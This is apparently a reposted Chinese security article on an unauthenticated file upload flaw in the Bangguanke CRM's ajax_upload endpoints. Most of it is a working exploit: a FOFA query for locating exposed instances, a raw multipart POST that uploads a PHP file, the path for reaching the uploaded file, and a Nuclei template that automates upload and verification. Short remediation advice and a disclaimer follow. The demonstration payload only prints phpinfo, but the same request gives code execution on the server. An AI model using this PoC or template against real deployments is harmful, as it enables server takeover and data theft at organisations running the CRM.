主页 > 游戏开发  > 

帮管客CRM文件上传漏洞

帮管客CRM文件上传漏洞

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

帮管客CRM是一款集客户档案、销售记录、业务往来等功能于一体的客户管理系统。帮管客CRM客户管理系统,客户管理,从未如此简单,一个平台满足企业全方位的销售跟进、智能化服务管理、高效的沟通协同、图表化.帮管客CRM ajax_upload_chat、ajax_upload等接口处存在文件上传漏洞,未经授权的攻击者可利用该漏洞获取服务器权限。

Ⅱ、fofa语句

app="帮管客-CRM"

Ⅲ、漏洞复现

POC

POST /index.php/upload/ajax_upload HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryv1WbOn5o ------WebKitFormBoundaryv1WbOn5o Content-Disposition: form-data; name="file"; filename="1.php" Content-Type: image/jpeg <?php phpinfo();unlink(__FILE__); ------WebKitFormBoundaryv1WbOn5o--

1、构建poc

2、访问

http://127.0.0.1/data//uploads//202402//202402022003581smuhnKHt.php

Ⅳ、Nuclei-POC

id: CRM-uploadfile info: name: 帮管客CRM ajax_upload_chat、ajax_upload等接口处存在文件上传漏洞 未经授权的攻击者可利用该漏洞获取服务器权限 author: WLF severity: high metadata: fofa-query: app="帮管客-CRM" variables: filename: "{{to_lower(rand_base(10))}}" boundary: "{{to_lower(rand_base(20))}}" http: - raw: - | POST /index.php/upload/ajax_upload HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryv1WbOn5o ------WebKitFormBoundaryv1WbOn5o Content-Disposition: form-data; name="file"; filename="1.php" Content-Type: image/jpeg <?php phpinfo();unlink(__FILE__); ------WebKitFormBoundaryv1WbOn5o-- - | GET data/uploads/{{path}}/{{path1}}.php HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 extractors: - type: regex name: path group: 1 regex: - 'uploads\\/(\w*)\\' internal: true - type: regex name: path1 group: 1 regex: - '\\/(\w*)\.php"' internal: true matchers: - type: dsl dsl: - status_code==200 && contains_all(body,"PHP")

Ⅴ、修复建议

1、请联系厂商进行修复;

2、如非必要,禁止公网访问该系统;

3、设置白名单访问。

标签:

帮管客CRM文件上传漏洞由讯客互联游戏开发栏目发布,感谢您对讯客互联的认可,以及对我们原创作品以及文章的青睐,非常欢迎各位朋友分享到个人网站或者朋友圈,但转载请说明文章出处“帮管客CRM文件上传漏洞

上一篇
GooglePlay上架:因行为透明度被拒审或下架的政策自查

下一篇
获取ping值最小IP

推荐文章